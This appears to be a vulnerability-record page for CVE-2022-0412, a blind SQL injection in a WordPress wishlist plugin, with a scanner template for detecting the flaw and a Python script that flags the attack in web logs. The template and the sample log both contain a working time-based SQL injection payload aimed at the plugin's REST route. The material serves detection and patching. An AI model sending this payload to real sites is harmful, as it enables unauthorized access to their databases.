| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2022-0412 | 28 Feb 2022 09:15 | – | attackerkb |
| CVE-2022-0412 | 4 Jul 2023 10:30 | – | circl |
| WordPress SQL Injection Vulnerability | 28 Feb 2022 00:00 | – | cnnvd |
| WordPress TI WooCommerce Wishlist plugin SQL injection vulnerability | 2 Mar 2022 00:00 | – | cnvd |
| CVE-2022-0412 | 28 Feb 2022 09:06 | – | cve |
| CVE-2022-0412 TI WooCommerce Wishlist < 1.40.1 - Unauthenticated Blind SQL Injection | 28 Feb 2022 09:06 | – | cvelist |
| CVE-2022-0412 | 28 Feb 2022 09:15 | – | nvd |
| WordPress TI WooCommerce Wishlist Plugin < 1.40.1 SQLi Vulnerability | 14 Mar 2022 00:00 | – | openvas |
| CVE-2022-0412 | 28 Feb 2022 09:15 | – | osv |
| WordPress TI WooCommerce Wishlist premium plugin <= 1.40.0 - Unauthenticated Blind SQL Injection (SQLi) vulnerability | 31 Jan 2022 00:00 | – | patchstack |
```yaml
id: CVE-2022-0412

info:
  name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
  author: edoardottt
  severity: critical
  description: |
    WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher).
  reference:
    - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
    - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0412
    - https://plugins.trac.wordpress.org/changeset/2668899
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0412
    cwe-id: CWE-89
    epss-score: 0.7458
    epss-percentile: 0.99436
    cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: templateinvaders
    product: ti_woocommerce_wishlist
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: word
        part: body
        words:
          - 'Product not found'

      - type: status
        status:
          - 400
# digest: 4a0a0047304502206440aeeb36aa054e4a836786f7735317a740398a66cde8a3d7ef504187e06d9e0221008f9f1b13ae42e411e3a49cf42cc27693fa11fbbb0f752608a8c14e2bd9a41e71:922c64590222798bb761d5b6d8e72950
```
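The template above detects the flaw by timing; the description also tells a defender what to look for in web-server logs: the `item_id` parameter of the `wishlist/remove_product` REST route is meant to be a numeric product ID, so any request where it is not a plain integer is worth alerting on. The following is an added example, not part of the template or the Vulners record, that scans access-log lines for that condition. The log format is assumed to be the common Apache combined format, the log lines are constructed samples (the second one carries the probe request from the template), and the pretty-permalink form `/wp-json/wc/v3/wishlist/remove_product/<id>` is assumed as an alternative spelling of the same route.

```python
"""Flag requests to the TI WooCommerce Wishlist remove_product REST route
whose item_id is not a plain integer (CWE-89 indicator for CVE-2022-0412).

Example code for log review; not the plugin's or the template author's code.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed Apache combined log format: client, identity, user, [timestamp],
# "METHOD target PROTOCOL", status, size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Route and parameter named in the advisory description.
WISHLIST_REMOVE_ROUTE = "/wc/v3/wishlist/remove_product/"
TAINTED_PARAM = "item_id"

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Feb/2022:09:15:01 +0000] '
    '"GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=42 HTTP/1.1" 200 57',
    '198.51.100.7 - - [28/Feb/2022:09:15:09 +0000] '
    '"GET /?rest_route=/wc/v3/wishlist/remove_product/1'
    '&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 400 41',
    '203.0.113.5 - - [28/Feb/2022:09:16:00 +0000] '
    '"GET /wp-json/wc/v3/products?per_page=5 HTTP/1.1" 200 1200',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_item_id(target):
    """Return the offending item_id value when the request targets the wishlist
    remove_product route with a non-integer item_id; otherwise None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    route = params.get("rest_route", [""])[0]
    on_route = route.startswith(WISHLIST_REMOVE_ROUTE) or parts.path.startswith(
        "/wp-json" + WISHLIST_REMOVE_ROUTE
    )
    if not on_route:
        return None
    for value in params.get(TAINTED_PARAM, []):
        # parse_qs already percent-decoded once; decoding again catches
        # double-encoded values before the integer check.
        value = unquote(value).strip()
        if not value.isdigit():
            return value
    return None


def scan(lines):
    """Return (client, status, item_id) for every line that trips the check."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        bad = suspicious_item_id(rec["target"])
        if bad is not None:
            findings.append((rec["client"], rec["status"], bad))
    return findings


if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} non-integer item_id={value!r}")
```

On the constructed sample the scanner reports only the second line; the benign `item_id=42` request and the unrelated products query pass. The integer check is deliberately the whole rule rather than a signature for `union` or `sleep`, because the route accepts nothing but a numeric ID and any other shape is anomalous whatever the payload looks like.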